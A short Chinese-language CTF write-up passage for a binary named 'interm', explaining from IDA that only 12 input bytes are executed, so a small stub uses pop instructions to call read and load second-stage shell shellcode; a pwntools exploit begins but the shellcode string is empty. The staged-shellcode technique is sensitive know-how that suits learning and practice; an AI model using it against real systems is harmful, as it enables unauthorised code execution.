查看ida 这里程序只会把输入的前12字节内容移到虚拟地址里，然后执行，大小不足以让执行shellcode，只能用pop寄存器调用read，再把gets hell的shellcode输入进去 完整exp： from pwn import*context(log_level='debug',arch='amd64')p=process('./interm')shellcode=''